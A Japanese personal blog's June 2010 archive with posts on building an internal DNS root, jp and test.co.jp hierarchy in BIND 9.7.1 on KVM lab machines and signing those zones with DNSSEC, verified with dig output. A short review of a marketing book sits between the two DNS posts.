lost and found ( for me ? ): June 2010

how to deploy DNSSEC on Auth Servers

DNSSEC テスト用ゾーンを準備 ( 下記 )

下記の環境を使用する。

http://lost-and-found-narihiro.blogspot.com/2010/06/dns-how-to-deploy-internal-root-zone-jp.html

# named -v
BIND 9.7.1

internal root : hat1-vm 192.168.1.50
internal jp : hat2-vm 192.168.1.51
internal test.co.jp : hat3-vm 192.168.1.52
cashing name server : hat4-vm 192.168.1.80

まずは、Island of chain trust を作成する前に各ゾーンを DNSSEC に対応させる。

[ internal root : hat1-vm ]

[root@hat1-vm named]# cat root_zone_internal.db
$TTL 86400
@ IN SOA x.root-servers.net. hostmaster.root-servers.net. (
2010062304
1h
15m
30d
1h )
IN NS x.root-servers.net.

x.root-servers.net. IN A 192.168.1.50

jp. IN NS x.dns.jp.
x.dns.jp. IN A 192.168.1.51

- generate KSK

[root@hat1-vm named]# pwd
/var/named <- ゾーンファイルがあるディレクトリ

[root@hat1-vm named]# dnssec-keygen -a RSASHA256 -3 -b 1024 -f ksk -r /dev/urandom .
Generating key pair..++++++ ...........................................................................++++++
K.+008+24796

   -3
   Use an NSEC3-capable algorithm to generate a DNSSEC key. If this
   option is used and no algorithm is explicitly set on the command
   line, NSEC3RSASHA1 will be used by default. Note that RSASHA256 and
   RSASHA512 algorithms are NSEC3-capable.

-a algorithm

- generate ZSK

[root@hat1-vm named]# dnssec-keygen -a RSASHA256 -3 -b 2048 -r /dev/urandom .Generating key pair................................+++ ................................+++
K.+008+18525

- modify zone file

ゾーンファイルに KSK , ZSK と登録

[root@hat1-vm named]# cat K.+008+*.key > root.key

[root@hat1-vm named]# cat root_zone_internal.db
$TTL 86400
@ IN SOA x.root-servers.net. hostmaster.root-servers.net. (
2010062304
1h
15m
30d
1h )
IN NS x.root-servers.net.

x.root-servers.net. IN A 192.168.1.50

jp. IN NS x.dns.jp.
x.dns.jp. IN A 192.168.1.51

$INCLUDE "root.key";

- ゾーンに書名

[root@hat1-vm named]# dnssec-signzone -o . root_zone_internal.db
Verifying the zone using the following algorithms: RSASHA256.
Zone signing complete:
Algorithm: RSASHA256: KSKs: 1 active, 0 stand-by, 0 revoked
   ZSKs: 1 active, 0 stand-by, 0 revoked
root_zone_internal.db.signed

- modify named.conf

options {
   directory "/var/named";
   pid-file "/var/run/named/named.pid";
   max-cache-size 20M;
   recursion no;
   version "";
   dnssec-enable yes; <- これ
   dnssec-validation yes; <- これ
};

zone "." in {
   type master;
# file "root_zone_internal.db";
   file "root_zone_internal.db.signed";　<-これ
   };

- BIND起動

[root@hat1-vm named]# named

シスログ

Jun 30 00:43:23 hat1-vm named[2243]: zone ./IN: loaded serial 2010062304 (DNSSEC signed)

チェック。大丈夫そう。

[root@hat1-vm named]# dig @127.1 . soa +dnssec

; <<>> DiG 9.7.1 <<>> @127.1 . soa +dnssec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 40509
;; flags: qr aa rd; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 3
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;. IN SOA

;; ANSWER SECTION:
. 86400 IN SOA x.root-servers.net. hostmaster.root-servers.net. 2010062304 3600 900 2592000 3600
. 86400 IN RRSIG SOA 8 0 86400 20100729144058 20100629144058 18525 . v7wamV28v9gv36qAFy+FO6O90/aAU7gVmouFIqZobmZEZkpBSRpKqRoE sJS8DwtylTswMUStdNoQQksh7Am0T+s/C/NzAdw5Q7P4EgEZl0994KJD ecuDWacw8sh4ZA2WTS45X3vpiQdLrhRHuVp0oow5zazUCvs7d3d0PkIn LRGTDSXPvTwrWAVAwfqZc7sOitXxV0w4ZQpoQLNbMDO4c1QFNGbtoWOf lBjX2PBuAcA3vSDQ5045INszrOCBkPcgO5n9yAUddagSDxS41+4827K8 qAy4SaAwuCEkeXCMeRUXl6suh9KFmLtsH4sEnjrHkN8W/trmaRZNKG9O 1NEFhg==

[root@hat1-vm named]# dig @127.1 jp soa +dnssec

; <<>> DiG 9.7.1 <<>> @127.1 jp soa +dnssec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 2949
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 3, ADDITIONAL: 2
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;jp. IN SOA

;; AUTHORITY SECTION:
jp. 86400 IN NS x.dns.jp.
jp. 3600 IN NSEC x.root-servers.net. NS RRSIG NSEC
jp. 3600 IN RRSIG NSEC 8 1 3600 20100729144058 20100629144058 18525 . d1+KRH3zHRUbHjWa89PteodxieWybwJ1JHu8FVTVuQrS2q47qyZPyhzu BmA8XR9HW2B3a7ZML8IxMNB2pjPgnDguwoO+Kr0W0A72RueLkGFbw0Xd A2j2qcMdEvit7O2DMMe1Kx8ILclxZ+xtZrv4AyPU4Pt72u6Kqko3rvTX wQMsxzv5D7A7bLLJ5V6CgOT7fmRZFHwpKbEX2akScSEK77XXbOp+Paop dVlmmGwVpTeidtHQQy9AB7N27/AXiWBWmy63+1kUsclQOlIbs4i5NtO1 VeDjSW3TDW81ZO6kRkXWi6kQq0kDfeScH9ztswx74JNn5dQpmeMf+IKQ YKP4XQ==

;; ADDITIONAL SECTION:
x.dns.jp. 86400 IN A 192.168.1.51

;; Query time: 3 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Wed Jun 30 00:45:53 2010
;; MSG SIZE rcvd: 394

[root@hat1-vm named]#
[root@hat1-vm named]# dig @127.1 co.jp soa +dnssec

; <<>> DiG 9.7.1 <<>> @127.1 co.jp soa +dnssec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 1151
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 3, ADDITIONAL: 2
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;co.jp. IN SOA

;; AUTHORITY SECTION:
jp. 86400 IN NS x.dns.jp.
jp. 3600 IN NSEC x.root-servers.net. NS RRSIG NSEC
jp. 3600 IN RRSIG NSEC 8 1 3600 20100729144058 20100629144058 18525 . d1+KRH3zHRUbHjWa89PteodxieWybwJ1JHu8FVTVuQrS2q47qyZPyhzu BmA8XR9HW2B3a7ZML8IxMNB2pjPgnDguwoO+Kr0W0A72RueLkGFbw0Xd A2j2qcMdEvit7O2DMMe1Kx8ILclxZ+xtZrv4AyPU4Pt72u6Kqko3rvTX wQMsxzv5D7A7bLLJ5V6CgOT7fmRZFHwpKbEX2akScSEK77XXbOp+Paop dVlmmGwVpTeidtHQQy9AB7N27/AXiWBWmy63+1kUsclQOlIbs4i5NtO1 VeDjSW3TDW81ZO6kRkXWi6kQq0kDfeScH9ztswx74JNn5dQpmeMf+IKQ YKP4XQ==

;; ADDITIONAL SECTION:
x.dns.jp. 86400 IN A 192.168.1.51

;; Query time: 2 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Wed Jun 30 00:45:59 2010
;; MSG SIZE rcvd: 397

[root@hat1-vm named]#

キャッシュサーバから確認。

trusted-keys に internal root の KSK ( K.+008+24796 ) を登録

   1 options {
   2 directory "/var/named";
   3 pid-file "/var/run/named/named.pid";
   4 max-cache-size 5M;
   5 recursion yes;
   6 version "";
   7 dnssec-enable yes;
   8 dnssec-validation yes;

   21 zone "." in {
   22 type hint;
   23 file "named.ca";
   24 };

   51 trusted-keys {
   52
   53 "." 257 3 8 "AwEAAbMQ3cEdLfYbAitpiWvfJkWKncHe2PyNwd77jHCwy0eSm7EBtqqo rZ 53 ic53HgeolqwoAxut/m+BmGCTHU8pcbrphiGIxrSz1o4KjzCcchKmvz vClM78IrB9XZA8Z1t 53 wTMf/n2i1aMxSbIrmaP9Ik4eu7xr2RwNu2y6LaJ fFGSF/7Z";
   54
   55 };

hints は内部ルートを指定している。

[root@hat4-vm hattori]# cat /var/named/named.ca
. 3600000 IN NS X.ROOT-SERVERS.NET.
X.ROOT-SERVERS.NET. 3600000 A 192.168.1.50

いざ、dig 。ad ビットが立ってるので大丈夫そう。

[root@hat4-vm ~]# dig @127.1 . soa +dnssec +multiline

; <<>> DiG 9.7.1 <<>> @127.1 . soa +dnssec +multiline
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 15386
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;. IN SOA

;; ANSWER SECTION:
. 86400 IN SOA x.root-servers.net. hostmaster.root-servers.net. (
2010062304 ; serial
3600 ; refresh (1 hour)
900 ; retry (15 minutes)
2592000 ; expire (4 weeks 2 days)
3600 ; minimum (1 hour)
)
. 86400 IN RRSIG SOA 8 0 86400 20100729144058 (
20100629144058 18525 .
v7wamV28v9gv36qAFy+FO6O90/aAU7gVmouFIqZobmZE
ZkpBSRpKqRoEsJS8DwtylTswMUStdNoQQksh7Am0T+s/

[root@hat4-vm ~]# dig @127.1 . ns +dnssec +multiline

; <<>> DiG 9.7.1 <<>> @127.1 . ns +dnssec +multiline
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 45504
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;. IN NS

;; ANSWER SECTION:
. 86250 IN NS x.root-servers.net.
. 86250 IN RRSIG NS 8 0 86400 20100729144058 (
20100629144058 18525 .
tME2znW74GdLmDOuspJCcrWrAEu45nfEV9iP+k5HidCG
R19q12e3CMjvsWrKJB4M4238rhNipJc9YA+rWMw7bwwD
BgzwTJDI1HAt30eMiEJnAnBqDYoievjDDpSl32TkyuUQ

[ internal jp zone : hat2-vm ]

zone "jp" in {
   type master;
   file "jp_zone_internal.db";
   };

[root@hat2-vm named]# cat jp_zone_internal.db
$TTL 86400
@ IN SOA x.dns.jp. hostmaster.dns.jp. (
2010062303
1h
15m
30d
1h )
IN NS x.dns.jp.

x.dns.jp. IN A 192.168.1.51

test.co.jp. IN NS ns.test.co.jp.
ns.test.co.jp. IN A 192.168.1.52

- generate KSK

[root@hat2-vm named]# pwd
/var/named

# dnssec-keygen -a RSASHA256 -3 -b 1024 -f ksk -r /dev/urandom jp

- generate ZKK

# dnssec-keygen -a RSASHA256 -3 -b 2048 -r /dev/urandom jp

- modify jp zone file

[root@hat2-vm named]# cat Kjp.+008+*.key > jp.key

[root@hat2-vm named]# cat jp_zone_internal.db
$TTL 86400
@ IN SOA x.dns.jp. hostmaster.dns.jp. (
2010062303
1h
15m
30d
1h )
IN NS x.dns.jp.

x.dns.jp. IN A 192.168.1.51

test.co.jp. IN NS ns.test.co.jp.
ns.test.co.jp. IN A 192.168.1.52

$INCLUDE "jp.key";

- sign jp zone

[root@hat2-vm named]# dnssec-signzone -o jp jp_zone_internal.db
Verifying the zone using the following algorithms: RSASHA256.
Zone signing complete:
Algorithm: RSASHA256: KSKs: 1 active, 0 stand-by, 0 revoked
   ZSKs: 1 active, 0 stand-by, 0 revoked
jp_zone_internal.db.signed

[root@hat2-vm named]# named

Jun 30 01:25:19 hat2-vm named[2326]: zone jp/IN: loaded serial 2010062303 (DNSSEC signed)

[root@hat2-vm named]# dig @127.1 jp soa +dnssec

; <<>> DiG 9.7.1 <<>> @127.1 jp soa +dnssec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 17885
;; flags: qr aa rd; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 3
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;jp. IN SOA

;; ANSWER SECTION:
jp. 86400 IN SOA x.dns.jp. hostmaster.dns.jp. 2010062303 3600 900 2592000 3600
jp. 86400 IN RRSIG SOA 8 1 86400 20100729152408 20100629152408 20163 jp. WNS9s/JLh+QZcj73AkntNcu3fR7UfXgOZGq3aU7S55AjPOA5kCX71hMa OnRv2oFnojozxtTC6nOEWVXBifJ7pmbAApMg4W8RCwQAi2lVO43M+liF U1iJ4FuWT7BNVG63O4oUlQxhBWkgmV2h3eIL3m2b1LsGhWb09d9CH7hj Se6AmpmSRR69A8lAmUG/3godGnkqyPUPIZ6izLo9Q9PjCo4FLpiM7taT I+imqPkj54UEAEgNqP0pgNAnWjToZtpLhD2tsxuwW9yqyHaAv8/fgo9o 8xNNqz3m5bdxlc4KPdhBxDPl1hw6Xbxx0YOw+4Wp+A4RrbAaRpefYjzi RxHD1w==

;; AUTHORITY SECTION:
jp. 86400 IN NS x.dns.jp.
jp. 86400 IN RRSIG NS 8 1 86400 20100729152408 20100629152408 20163 jp. o0KawU5TH51OJq9/uyApCjydNUMuEmLzFOL4yDzDaw+TfHzBfkebRgdQ OFosbykoRBOVYZIy+7x0/B8vYRPvHm5K9tRFFIoxbEmV7RdTsY1NJqvI CB2fjhMJFzO1MS9H87Ws4y/q6aXu4h0+jitILTPV7U2W66YxRqQCHp25 xg6vCz/JI6snXlqAehswnNIRx3yHsIxxdBxReJRxhzJvjdIpLfPRPPcv ILw84+C5xzQCmKTw8CyK4ceS0kVWmriVSjgyKH2fTMJZ6LSNgguvc88q Bf5sGuoEPpJ/9BXV2o7Hj9BdpPXhinvbHc/Wttu6+UUIFfC36Ql9FpqV SOfXPA==

;; ADDITIONAL SECTION:
x.dns.jp. 86400 IN A 192.168.1.51
x.dns.jp. 86400 IN RRSIG A 8 3 86400 20100729152408 20100629152408 20163 jp. ZRtCXGXRiog8qvAn8OWjt+Ougu5GX7cHeE7TFHGTjGzGc3hVe4uCTFd8 OFKwFdb1Jp0DGZPXw2drjPGKFT/Al/uGHV53f3aacFxXIbd/AL0OGEat nMwYZS6D2a6VMezxZy3TTSc6XO9ZD+7niTtmMdvLAVtjHoO9Q9T6k7AW DVyDMazMF0woaYy8eRxjlCI5eMdp1Wdg+kfoKgAF/Nuv01yx7Ii8p3L7 wwv/odrC9F/lKSvNc17YoGzSsCAtd0TR0gpLNbZwdXXBFLq90hgoICpL kIcQdn2nB9Xu3jzO+N9Dy7TzvGunpMC1jt4nTCe0W5Wcl02laPWdejU4 uFik4g==

;; Query time: 3 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Wed Jun 30 01:25:57 2010
;; MSG SIZE rcvd: 984

[root@hat2-vm named]#
[root@hat2-vm named]# dig @127.1 co.jp soa +dnssec

; <<>> DiG 9.7.1 <<>> @127.1 co.jp soa +dnssec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 32409
;; flags: qr aa rd; QUERY: 1, ANSWER: 0, AUTHORITY: 4, ADDITIONAL: 1
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;co.jp. IN SOA

;; AUTHORITY SECTION:
jp. 3600 IN SOA x.dns.jp. hostmaster.dns.jp. 2010062303 3600 900 2592000 3600
jp. 3600 IN RRSIG SOA 8 1 86400 20100729152408 20100629152408 20163 jp. WNS9s/JLh+QZcj73AkntNcu3fR7UfXgOZGq3aU7S55AjPOA5kCX71hMa OnRv2oFnojozxtTC6nOEWVXBifJ7pmbAApMg4W8RCwQAi2lVO43M+liF U1iJ4FuWT7BNVG63O4oUlQxhBWkgmV2h3eIL3m2b1LsGhWb09d9CH7hj Se6AmpmSRR69A8lAmUG/3godGnkqyPUPIZ6izLo9Q9PjCo4FLpiM7taT I+imqPkj54UEAEgNqP0pgNAnWjToZtpLhD2tsxuwW9yqyHaAv8/fgo9o 8xNNqz3m5bdxlc4KPdhBxDPl1hw6Xbxx0YOw+4Wp+A4RrbAaRpefYjzi RxHD1w==
jp. 3600 IN NSEC test.co.jp. NS SOA RRSIG NSEC DNSKEY
jp. 3600 IN RRSIG NSEC 8 1 3600 20100729152408 20100629152408 20163 jp. JIQHWC+6W7+geaCUTKC1+DCSZqMKwikcoPZcXCYhOixqNpB9sT6p3R8A fdKf19mMXDyUIUbqN6zDNA1OP7x5gwJ4eFr8Kv+QA5Cafp3NaKkrcoGf iZA0lN+A1nIOVxvtbP9tj8pyOI0Vb+nMuQhbvac9IOVE8hxHzihh+04D tQRSJ/lHlgNyQK1THbwaQDfstw4DzxWyeCOrBHj7Q/4ofpL5XwvjnwfI cMfrj4CBHIHID/64pq6CulfvJwjaCFBU4Jalx99FwxeZ0DD+UY7zVGS5 F/nus3QkDqhO382YFiJp6UHsb/T5uOREq9v0kWe/UDEYg7NZLD0P7KHU 8q4+bw==

Island of chain trust になってないので、キャッシュサーバからの設定はまだ。

[ test.co.jp : hat3-vm ]

[root@hat3-vm named]# cat test.co.jp.db
$TTL 86400
@ IN SOA ns.test.co.jp. hostmaster.test.co.jp. (
   2010062303
   1h
   15m
   30d
   1h )
   IN NS ns.test.co.jp.

ns.test.co.jp. IN A 192.168.1.52
www.test.co.jp. IN A 10.0.0.1

  133 dnssec-keygen -a RSASHA256 -3 -b 1024 -f ksk -r /dev/urandom test.co.jp
  134 dnssec-keygen -a RSASHA256 -3 -b 2048 -r /dev/urandom test.co.jp

[root@hat3-vm named]# cat Ktest.co.jp.+008+*.key > test.co.jp.key

[root@hat3-vm named]# cat test.co.jp.db
$TTL 86400
@ IN SOA ns.test.co.jp. hostmaster.test.co.jp. (
   2010062303
   1h
   15m
   30d
   1h )
   IN NS ns.test.co.jp.

ns.test.co.jp. IN A 192.168.1.52
www.test.co.jp. IN A 10.0.0.1

$INCLUDE "test.co.jp.key";

[root@hat3-vm named]# dnssec-signzone -o test.co.jp test.co.jp.db
Verifying the zone using the following algorithms: RSASHA256.
Zone signing complete:
Algorithm: RSASHA256: KSKs: 1 active, 0 stand-by, 0 revoked
   ZSKs: 1 active, 0 stand-by, 0 revoked
test.co.jp.db.signed

zone "test.co.jp" {
type master;
# file "test.co.jp.db";
file "test.co.jp.db.signed";
};

Jun 30 01:37:35 hat3-vm named[2764]: zone test.co.jp/IN: loaded serial 2010062303 (DNSSEC signed)

[root@hat3-vm named]# dig @127.1 test.co.jp soa +dnssec

; <<>> DiG 9.7.1 <<>> @127.1 test.co.jp soa +dnssec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 48852
;; flags: qr aa rd; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 3
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;test.co.jp. IN SOA

;; ANSWER SECTION:
test.co.jp. 86400 IN SOA ns.test.co.jp. hostmaster.test.co.jp. 2010062303 3600 900 2592000 3600
test.co.jp. 86400 IN RRSIG SOA 8 3 86400 20100729153623 20100629153623 8448 test.co.jp. TMtWJBFkKfWnBYyu/I1YddPXisB0HHN3YMJGtFvyPzqRzCpByoXGm5dp Hp30+XosNWdAQaNharVcdILUHJPdBAePzhT8HLiNQfTFVTyrLNikRVvp gmDtey8ueI5Kx+78oTwHHWAzcjUgT+9r9R0w4hP8ggjd0VR4KZb1k0rR wpkAuTKcFroJfQTS/7Kk6tYhvJ5DOfkutcQYK5ymhmiQoRKQl0zgDb// 5Lg8DwimbVofIhwDgSJYxKE2qSxN+pu1RFzPWB5snAJ5IOQMDwnAeU3h k0svEta6uzfI8cRPAgKATx47JmGcMCbQ25J2HhrlW52Dc4SaYIKVuO+/ wwCnlA==

;; AUTHORITY SECTION:
test.co.jp. 86400 IN NS ns.test.co.jp.
test.co.jp. 86400 IN RRSIG NS 8 3 86400 20100729153623 20100629153623 8448 test.co.jp. wAVapgwcoYN/BRZODCUC/JeFp/Nfg2r4cVP5vZGQZzalQRmSomVO6Iwv VLlZkajq2XLbS1v5LHIeu/wAWBaA0ms2MQ4eXSUZNmVIMXj3pyYgVTA2 WSENhzKZ2MsNoOJn3D2ypXxrRLB8SF2zLKHI9N4yRNtT6MDUD8PNT46c f2mEQMfotZdmd5tS2A/J13+nB2gCFN8MBxPWvJLnKoDYZUfc3y3the4b 3KpyJMswO4kvy4VqR9rHVYntIr4D5QFcIqxt+GtBjgAgx/W3C8TE+2ca akdiwhnwNuBKCSnAfH+njuc9+J0ReHa+CJO+XIhVCHRF8QBNImxR7odc uRD7VA==

;; ADDITIONAL SECTION:
ns.test.co.jp. 86400 IN A 192.168.1.52
ns.test.co.jp. 86400 IN RRSIG A 8 4 86400 20100729153623 20100629153623 8448 test.co.jp. bZgXs0iHMhS8VCbKSYMtYSvbM1qWd2bym4HeMsM2BihmYaFkm9M1BmTy pQEv9Jpb3MuZmW7iA6GWyX2u0xepbRI3CKmZMlzGX6MhuK8a1GgprH+R 2nlx0sLlkP6VT0dmOh1F1ANu6M4RE1zo2lHR++X9vacpqZzpJPhAegNr Aq09u35RnUcUSLo7miQGuO11/CESK76w1GXLXEDjxzkaqEIxIwVCwA9t E4mx7WG3U9zOqMlRgo9vJ5o06EcANhVDASGNCrw9I6AUPr9AYFn/lH/s wIE0eDZPqDkklxATNBCaGqOKL5j5eXEY4sjFSzHn82A0j/2JQkK2EZ/s EqeCrw==

とりあえずここまで。

Cheers!

書評: マーケティング実践講座

マーケティング実践講座

著者須藤和和

ダイヤモンド社

タイトルのとおり、マーケティング戦略の本

この本のよいと感じたことは、マーケティング行う上での手順を説明し、その後、

実例を利用し商品開発から販売までの戦略について解説しており、とても理解しやすい構成となっているところ。

セグメンテーション、ターゲット顧客の選定、商品開発、価格決定、プロモーション、流通経路の決定方法

についての考え方が説明されている。

分析手法として、SWOT分析、3C , 4P、回帰分析などの説明があり、とても有用である。

顧客のニーズ調査のためのアンケートの作成に関して、どのようなアンケートがよい or not の説明はとても興味深かった。

ついつい、やってしまいがちな例などがあり、そうだそうだ、

とうなずく部分が多数あった。

実例として、サントリー DAKARA の製品開発から販売にいたるまで、どのようなマーケティング戦略が立てられたか、丁寧に解説されており、理解を深めるのに役立った。

具体的には競合製品 ( ポカリ、アクエリアス ) が存在する中でどのような戦略を取ったと考えられるか、詳細に解説されており、学ぶべきところが多数あった。

競合製品がある中で、どのようにして販売戦略を立てるか、いつも悩む問題なので、

この本で解説されていることは、色々と応用できると感じられた一冊である。

DNS: how to deploy internal root zone , jp zone , test.co.jp zone for internal testing

この設定であってるのかな??。。

ミスってるかも。

internal root : 192.168.1.50 ( hostname : hat1-vm )

internal jp ( co.jp ) : 192.168.1.51 ( hostname : hat2-vm )

test.co.jp : 192.168.1.52 ( hostname : hat3-vm )

キャッシュサーバ : 192.168.1.80 ( hostname : hat4-vm )

All DNS servers are running under KVM ( Kernel-based Virtual Machine).

# named -v

BIND 9.7.1

[ internal root server ( hat1-vm ) ]

zone "." in {

type master;

file "root_zone_internal.db";

};

[root@hat1-vm ~]# cat /var/named/root_zone_internal.db

$TTL 86400

. IN SOA x.root-servers.net. hostmaster.root-servers.net. (

2010062304

15m

30d

1h )

IN NS x.root-servers.net.

x.root-servers.net. IN A 192.168.1.50

jp. IN NS x.dns.jp.

x.dns.jp. IN A 192.168.1.51

co.jp. IN NS x.dns.jp.

[ internal jp (co.jp ) zone ( hat2-vm ) ]

zone "." in {

type hint;

file "named.ca";

};

zone "jp" in {

type master;

file "jp_zone_internal.db";

};

ルートサーバは internal root server の IP , 192.168.1.50を指定

[root@hat2-vm ~]# cat /var/named/named.ca

. 3600000 IN NS X.ROOT-SERVERS.NET.

X.ROOT-SERVERS.NET. 3600000 A 192.168.1.50

[root@hat2-vm ~]#

- jp ゾーン

[root@hat2-vm ~]# cat /var/named/jp_zone_internal.db

$TTL 86400

jp. IN SOA x.dns.jp. hostmaster.dns.jp. (

2010062303

15m

30d

1h )

IN NS x.dns.jp.

x.dns.jp. IN A 192.168.1.51

test.co.jp. NS ns.test.co.jp.

ns.test.co.jp. IN A 192.168.1.52

[root@hat2-vm ~]#

[ test.co.jp ゾーン ( hat3-vm ) ]

zone "." in {

type hint;

file "named.ca";

};

zone "test.co.jp" {

type master;

file "test.co.jp.db";

};

[root@hat3-vm ~]# cat /var/named/named.ca

. 3600000 IN NS X.ROOT-SERVERS.NET.

X.ROOT-SERVERS.NET. 3600000 A 192.168.1.50

[root@hat3-vm ~]#

[root@hat3-vm ~]# cat /var/named/test.co.jp.db

$TTL 86400

test.co.jp. IN SOA ns.test.co.jp. hostmaster.test.co.jp. (

2010062303

15m

30d

1h )

IN NS ns.test.co.jp.

ns.test.co.jp. IN A 192.168.1.52

www.test.co.jp. IN A 10.0.0.1

[ キャッシュサーバ ( hat4-vm ) ]

options {

directory "/var/named";

pid-file "/var/run/named/named.pid";

max-cache-size 5M;

recursion yes;

version "";

};

zone "." in {

type hint;

file "named.ca";

};

[root@hat4-vm ~]# cat /var/named/named.ca

. 3600000 IN NS X.ROOT-SERVERS.NET.

X.ROOT-SERVERS.NET. 3600000 A 192.168.1.50

[ キャッシュサーバから www.test.co.jp の名前解決ができるか確認 ]

名前解決できたー

[root@hat4-vm ~]# dig @127.1 www.test.co.jp.

; <<>> DiG 9.7.1 <<>> @127.1 www.test.co.jp.

; (1 server found)

;; global options: +cmd

;; Got answer:

;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 42021

;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:

;www.test.co.jp. IN A

;; ANSWER SECTION:

www.test.co.jp. 86400 IN A 10.0.0.1

;; AUTHORITY SECTION:

test.co.jp. 86400 IN NS ns.test.co.jp.

ルートからたどってみると、

[root@hat4-vm ~]# dig @192.168.1.50 www.test.co.jp +norec

; <<>> DiG 9.7.1 <<>> @192.168.1.50 www.test.co.jp +norec

; (1 server found)

;; global options: +cmd

;; Got answer:

;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 29607

;; flags: qr; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; QUESTION SECTION:

;www.test.co.jp. IN A

;; AUTHORITY SECTION:

jp. 86400 IN NS x.dns.jp.

;; ADDITIONAL SECTION:

x.dns.jp. 86400 IN A 192.168.1.51

[root@hat4-vm ~]# dig @192.168.1.51 www.test.co.jp +norec

; <<>> DiG 9.7.1 <<>> @192.168.1.51 www.test.co.jp +norec

; (1 server found)

;; global options: +cmd

;; Got answer:

;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 48652

;; flags: qr; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; QUESTION SECTION:

;www.test.co.jp. IN A

;; AUTHORITY SECTION:

test.co.jp. 86400 IN NS ns.test.co.jp.

;; ADDITIONAL SECTION:

ns.test.co.jp. 86400 IN A 192.168.1.52

[root@hat4-vm ~]# dig @192.168.1.52 www.test.co.jp +norec

; <<>> DiG 9.7.1 <<>> @192.168.1.52 www.test.co.jp +norec

; (1 server found)

;; global options: +cmd

;; Got answer:

;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 65425

;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1

;; QUESTION SECTION:

;www.test.co.jp. IN A

;; ANSWER SECTION:

www.test.co.jp. 86400 IN A 10.0.0.1

;; AUTHORITY SECTION:

test.co.jp. 86400 IN NS ns.test.co.jp.

;; ADDITIONAL SECTION:

ns.test.co.jp. 86400 IN A 192.168.1.52

他クエリいろいろ ( dig @a.root-servers.net , dig @a.dns.jp の回答と比べてあっているっぽいので,設定は大丈夫かなと )

[root@hat4-vm ~]# dig @192.168.1.50 . +norec

; <<>> DiG 9.7.1 <<>> @192.168.1.50 . +norec

; (1 server found)

;; global options: +cmd

;; Got answer:

;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 59980

;; flags: qr aa; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:

;. IN A

;; AUTHORITY SECTION:

. 3600 IN SOA x.root-servers.net. hostmaster.root-servers.net. 2010062304 3600 900 2592000 3600

;; Query time: 1 msec

;; SERVER: 192.168.1.50#53(192.168.1.50)

;; WHEN: Tue Jun 29 00:26:29 2010

;; MSG SIZE rcvd: 81

[root@hat4-vm ~]#

[root@hat4-vm ~]# dig @192.168.1.50 jp. +norec

; <<>> DiG 9.7.1 <<>> @192.168.1.50 jp. +norec

; (1 server found)

;; global options: +cmd

;; Got answer:

;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38991

;; flags: qr; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; QUESTION SECTION:

;jp. IN A

;; AUTHORITY SECTION:

jp. 86400 IN NS x.dns.jp.

;; ADDITIONAL SECTION:

x.dns.jp. 86400 IN A 192.168.1.51

;; Query time: 2 msec

;; SERVER: 192.168.1.50#53(192.168.1.50)

;; WHEN: Tue Jun 29 00:26:33 2010

;; MSG SIZE rcvd: 56

[root@hat4-vm ~]#

[root@hat4-vm ~]# dig @192.168.1.50 co.jp +norec

; <<>> DiG 9.7.1 <<>> @192.168.1.50 co.jp +norec

; (1 server found)

;; global options: +cmd

;; Got answer:

;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 39887

